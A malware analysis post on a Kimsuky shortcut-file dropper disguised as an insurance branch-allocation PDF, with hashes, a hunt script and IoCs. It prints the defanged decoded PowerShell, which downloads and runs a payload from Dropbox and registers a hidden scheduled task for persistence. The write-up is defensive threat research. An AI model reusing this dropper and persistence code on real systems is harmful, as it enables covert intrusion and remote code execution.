Insurance-themed malware made by Kimsuky: 241002-2024년 GA영업본부 담당지점 배분(10월) (2025.1.31)
Today we will look at 241002-2024년 GA영업본부 담당지점 배분(10월) (2025.1.31) (roughly, "2024 GA sales headquarters branch allocation (October)"), a piece of malware made by Kimsuky, the hacking group under North Korea's Reconnaissance General Bureau that, as always, I neither respect nor revere.
File name: 241002-2024년 GA영업본부 담당지점 배분(10월) v2.pdf.lnk
Size: 318,318 Bytes
MD5: 8a08fd5e8298c823e4ab356508d70490
SHA-1: 086be54505ef95d83be71d6b1e959610d36dc619
SHA-256: 71d56c61b765eee74dca65910ab9e0e2b35b21bcf6c97241ca7188a75f082f6f
The malware relies on PowerShell. When you open the shortcut, the payload turns out to be Base64-encoded, which is trivially decoded with CyberChef.
CyberChef Base64 decoding result:
$hhh = Join-Path ([System.(I)O.Path]::GetT(em)pPath()) "241002-2024년 GA영업(본)부 담당지점 배분(10월) v2(.)pdf";
wget -Uri "hxxps://dl.dropboxusercontent(.)com/scl/fi/vx23391zdxqu3qirc5z7g/241002-2024-GA-10-v2(.)pdf?rlkey=ih6seocq7csa4iab3md4m(9)m08&st=6sj4yyzp&dl=0" -OutFile $hhh;
& $hhh;
$ppp = Join-Path ($en(v):AppData) "chrome(.)ps1";
$str = '$aaa = Join(-)Path ($env:(Ap)pData) "temp.ps1"; wget -Uri "hxxps://dl(.)dropboxusercontent(.)com/scl/fi/gs58u6qvv(x)orzttv09yvt/kxsxhx-x.txt?rlkey=v86pd7i2njm(7)u0pfutl0knu68&st=zy1w6n67&dl=0" -OutFile $aaa; & ($)aaa; Remove-Item -P(a)th $aaa -Force;';
$str | Out-File -Fil(e)Path $ppp -Encoding UTF(8);
$action = New-Sche(d)uledTaskAction -Execute 'PowerShell(.)exe' -Argument '-Win(d)owStyle Hidden -nop -Non(I)nteractive -NoProfile -ExecutionP(o)licy Bypas(s) -Command "& {$abc = Joi(n)-Path ($env:A(p)pData) \"chrome(.)ps1\"; & $abc;}"';
$trigger = New-Sche(d)uledTaskTrigger -Once -At (Get-Date).Add(M)inutes(5) -R(e)petitionInterval ((N)ew-TimeSpan -Min(u)tes 30);
$settings = New-(S)cheduledTaskSettingsSet -Hidden;
Register-ScheduledTask -TaskName "ChromeUp(d)ateTaskMachine" -Action $action -Trigger $trigger -Settings $settings;
$aaa = …
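The decoded script persists by registering a hidden scheduled task that runs PowerShell with -WindowStyle Hidden and -ExecutionPolicy Bypass against a .ps1 dropped under %AppData%. The hunt below is an added example, not code from the original post: it uses the task name and script paths taken from the decoded script, and the regex checks generalize to any task that follows the same hidden-PowerShell-from-AppData pattern, so a renamed task is still caught.

```powershell
# Added example (not from the original post): hunt a Windows host for the
# scheduled-task persistence and dropped files seen in the decoded script.
$SuspiciousTaskNames = @('ChromeUpdateTaskMachine')         # task name from the decoded script
$DroppedScripts      = @('chrome.ps1', 'temp.ps1') |
    ForEach-Object { Join-Path $env:APPDATA $_ }            # paths the dropper writes to

function Test-SuspiciousTaskAction {
    param([Parameter(Mandatory)] $Action)
    # Only Exec actions carry Execute/Arguments; COM-handler actions are skipped.
    if (-not $Action.Execute) { return $false }
    $isPowerShell = $Action.Execute -match '(?i)powershell(\.exe)?$'
    $arguments    = [string]$Action.Arguments
    # Hidden window + execution-policy bypass + a .ps1 living under the AppData folder
    $hidden  = $arguments -match '(?i)-w\w*\s+hidden'         # -WindowStyle Hidden (prefixes allowed)
    $bypass  = $arguments -match '(?i)-e\w*\s+bypass'         # -ExecutionPolicy Bypass
    $appData = $arguments -match '(?i)\$env:AppData|\\AppData\\Roaming\\'
    $script  = $arguments -match '(?i)\.ps1\b'
    return ($isPowerShell -and $hidden -and $bypass -and $appData -and $script)
}

function Find-DropperPersistence {
    $findings = @()
    foreach ($task in Get-ScheduledTask) {
        $byName   = $SuspiciousTaskNames -contains $task.TaskName
        $byAction = @($task.Actions | Where-Object { Test-SuspiciousTaskAction $_ }).Count -gt 0
        if ($byName -or $byAction) {
            $reason = if ($byName) { 'known task name' } else { 'hidden PowerShell .ps1 from AppData' }
            $findings += [pscustomobject]@{
                Kind   = 'ScheduledTask'
                Name   = $task.TaskPath + $task.TaskName
                Detail = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' ; '
                Reason = $reason
            }
        }
    }
    foreach ($path in $DroppedScripts) {
        if (Test-Path -LiteralPath $path) {
            $findings += [pscustomobject]@{
                Kind   = 'DroppedFile'
                Name   = $path
                Detail = (Get-Item -LiteralPath $path).LastWriteTime
                Reason = 'script path written by the dropper'
            }
        }
    }
    return $findings
}

Find-DropperPersistence | Format-Table -AutoSize -Wrap
```

Run it from an elevated PowerShell session so Get-ScheduledTask can enumerate every task folder; an empty table means neither the task nor the dropped scripts were found.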
IoC
71d56c61b765eee74dca65910ab9e0e2b35b21bcf6c97241ca7188a75f082f6f
8a08fd5e8298c823e4ab356508d70490
086be54505ef95d83be71d6b1e959610d36dc619